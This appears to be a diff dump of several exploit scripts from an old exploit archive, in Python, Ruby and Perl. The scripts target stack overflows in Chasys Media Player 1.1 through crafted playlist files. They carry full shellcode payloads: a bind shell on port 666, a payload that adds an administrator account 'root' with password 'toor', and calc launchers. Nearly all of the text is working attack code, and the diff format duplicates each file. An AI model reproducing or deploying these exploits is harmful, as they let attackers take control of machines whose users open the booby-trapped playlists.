"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x36\x43\x36\x42\x50\x5a")
exploit = header + buff1 + eip + shellcode # klimontayne fe romayne :D
try:
out_file = open("exploit.pls",'w')
out_file.write(exploit)
out_file.close()
print "Exploit File Created!"
except:
print "Error"
# milw0rm.com [2009-03-18]
#usage: exploit.py
print "**************************************************************************"
print " Chasys Media Player(pls File) Local Stack overflow Exploit\n"
print " Founder: zAx my friend :)"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Good news : The program didn't crash after running the exploit :)"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A"
header += "\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74"
header += "\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65"
header += "\x31\x3D"
buff1 = "\x41" * 260
eip = "\x5D\x38\x82\x7C" # call esp kernel32.dll
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x33\x4b\x48\x4e\x37"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48"
"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x34"
"\x4b\x38\x4f\x55\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x31\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x48\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x31\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x56\x4e\x33\x4f\x55\x41\x53"
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x47"
"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x59"
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x36\x43\x36\x42\x50\x5a")
exploit = header + buff1 + eip + shellcode # klimontayne fe romayne :D
try:
out_file = open("exploit.pls",'w')
out_file.write(exploit)
out_file.close()
print "Exploit File Created!"
except:
print "Error"
# milw0rm.com [2009-03-18]

100
platforms/windows/local/8234.py
View file

@ -1,50 +1,50 @@
#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Credit flys to: zAx
#
# the good thing in this one that the program won't crash
# when the playlist file imported,and will keep running.
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*260
eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2
nops = "\x90" * 20
# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77"
"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb"
"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f"
"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d"
"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c"
"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff"
"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f"
"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44"
"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4"
"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16"
"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47"
"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5"
"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c"
"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d"
"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43"
"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44"
"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39"
"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb"
"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45"
"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4"
"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b"
"\x24\xec\xe3\xeb\xa7\x13\x35\x14")
ex = header+junk+eip+nops+shellcode
file=open("devil_inside.pls","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]
#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Credit flys to: zAx
#
# the good thing in this one that the program won't crash
# when the playlist file imported,and will keep running.
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*260
eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2
nops = "\x90" * 20
# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77"
"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb"
"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f"
"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d"
"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c"
"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff"
"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f"
"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44"
"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4"
"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16"
"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47"
"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5"
"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c"
"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d"
"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43"
"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44"
"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39"
"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb"
"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45"
"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4"
"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b"
"\x24\xec\xe3\xeb\xa7\x13\x35\x14")
ex = header+junk+eip+nops+shellcode
file=open("devil_inside.pls","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]

100
platforms/windows/local/8235.py
View file

@ -1,50 +1,50 @@
#!/usr/bin/python
# Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Credit flys to: zAx
#
# the good thing in this one that the program won't crash
# when the playlist file imported,and will keep running.
header = "#EXTM3U\n"
junk = "\x41"*260
eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2
nops = "\x90" * 20
# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77"
"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb"
"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f"
"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d"
"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c"
"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff"
"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f"
"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44"
"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4"
"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16"
"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47"
"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5"
"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c"
"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d"
"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43"
"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44"
"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39"
"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb"
"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45"
"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4"
"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b"
"\x24\xec\xe3\xeb\xa7\x13\x35\x14")
ex = header+junk+eip+nops+shellcode
file=open("devil_inside.m3u","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]
#!/usr/bin/python
# Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Credit flys to: zAx
#
# the good thing in this one that the program won't crash
# when the playlist file imported,and will keep running.
header = "#EXTM3U\n"
junk = "\x41"*260
eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2
nops = "\x90" * 20
# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77"
"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb"
"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f"
"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d"
"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c"
"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff"
"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f"
"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44"
"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4"
"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16"
"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47"
"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5"
"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c"
"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d"
"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43"
"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44"
"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39"
"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb"
"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45"
"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4"
"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b"
"\x24\xec\xe3\xeb\xa7\x13\x35\x14")
ex = header+junk+eip+nops+shellcode
file=open("devil_inside.m3u","w")
file.write(ex)
file.close()
# milw0rm.com [2009-03-18]

144
platforms/windows/local/8242.rb
View file

@ -1,72 +1,72 @@
#!/usr/bin/env ruby
# Chasys Media Player 1.1 .cue file Stack Overflow Exploit
# By Stack
# Mountassif Moad
# cat thnx.txt
# Simo-Soft - Houssamix - Skd - Fl0 fl0w & str0ke :d
#
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
files = gets.chomp.capitalize
puts "Name Of File : " + files +'.cue'
time1 = Time.new
$VERBOSE=nil
Header1= "\x5B\x70\x6C\x61\x79\x6C\x69"+
"\x73\x74\x5D\x0D\x46\x69\x6C"+
"\x65\x31\x3D"
Header2= "\x0D\x0A\x54\x52\x41\x43\x4B\x20\x30\x31\x20\x4D\x4F\x44\x45\x31\x2F\x32"+
"\x33\x35\x32\x0D\x0A\x20\x20\x20\x49\x4E\x44\x45\x58\x20\x30\x31"+
"\x20\x30\x30\x3A\x30\x30\x3A\x30\x30"
# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
Shellscode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+
"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+
"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+
"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+
"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+
"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+
"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+
"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+
"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+
"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+
"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+
"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+
"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+
"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+
"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+
"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+
"\x41\x54\x46\x54\x46\x54\x42\x50\x5a"
Over = "\x41" * 260
Nop = "\x90" * 20
Ret = "\x5D\x38\x82\x7C" # CALL ESP kernel32.dll Sp 2 FR & EN
# "\x35\x16\x39\x77" # CALL ESP Universel If box Have .Net 2
# ( this is my methode if i dont find an universel address in app i find adress
# in some famouse softwar who the victime 90 % install it )
Xpl = Header1 + Over + Ret + Nop + Shellscode + Header2
File.open( files+".cue", "w" ) do |the_file|
the_file.puts(Xpl)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + files +".cue :d"
end
# milw0rm.com [2009-03-19]
#!/usr/bin/env ruby
# Chasys Media Player 1.1 .cue file Stack Overflow Exploit
# By Stack
# Mountassif Moad
# cat thnx.txt
# Simo-Soft - Houssamix - Skd - Fl0 fl0w & str0ke :d
#
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
files = gets.chomp.capitalize
puts "Name Of File : " + files +'.cue'
time1 = Time.new
$VERBOSE=nil
Header1= "\x5B\x70\x6C\x61\x79\x6C\x69"+
"\x73\x74\x5D\x0D\x46\x69\x6C"+
"\x65\x31\x3D"
Header2= "\x0D\x0A\x54\x52\x41\x43\x4B\x20\x30\x31\x20\x4D\x4F\x44\x45\x31\x2F\x32"+
"\x33\x35\x32\x0D\x0A\x20\x20\x20\x49\x4E\x44\x45\x58\x20\x30\x31"+
"\x20\x30\x30\x3A\x30\x30\x3A\x30\x30"
# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
Shellscode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+
"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+
"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+
"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+
"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+
"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+
"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+
"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+
"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+
"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+
"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+
"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+
"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+
"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+
"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+
"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+
"\x41\x54\x46\x54\x46\x54\x42\x50\x5a"
Over = "\x41" * 260
Nop = "\x90" * 20
Ret = "\x5D\x38\x82\x7C" # CALL ESP kernel32.dll Sp 2 FR & EN
# "\x35\x16\x39\x77" # CALL ESP Universel If box Have .Net 2
# ( this is my methode if i dont find an universel address in app i find adress
# in some famouse softwar who the victime 90 % install it )
Xpl = Header1 + Over + Ret + Nop + Shellscode + Header2
File.open( files+".cue", "w" ) do |the_file|
the_file.puts(Xpl)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + files +".cue :d"
end
# milw0rm.com [2009-03-19]

62
platforms/windows/local/8246.pl
View file

@ -1,31 +1,31 @@
#!/usr/bin/perl
# --------------------------------------------------------------
# Chasys Media Player (.lst playlist) Local Buffer Overflow Exploit
# Discovered and Exploited By : zAx
# Thanks to all my friends !
# --------------------------------------------------------------
my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D";
my $junk = "\x41" x 260;
my $eip = "\x5D\x38\x82\x7C"; # Windows XP SP2 English ..
my $nopsleds = "\x90" x 19; # I Love you
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
my $sc =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6".
"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca".
"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e".
"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5".
"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7".
"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08".
"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb".
"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87".
"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb".
"\x51\x92\x42\x83";
my $exploit = $header.$junk.$eip.$nopsleds.$sc;
$file = "zAx.lst";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "Done \n";
# milw0rm.com [2009-03-19]
#!/usr/bin/perl
# --------------------------------------------------------------
# Chasys Media Player (.lst playlist) Local Buffer Overflow Exploit
# Discovered and Exploited By : zAx
# Thanks to all my friends !
# --------------------------------------------------------------
my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D";
my $junk = "\x41" x 260;
my $eip = "\x5D\x38\x82\x7C"; # Windows XP SP2 English ..
my $nopsleds = "\x90" x 19; # I Love you
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
my $sc =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6".
"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca".
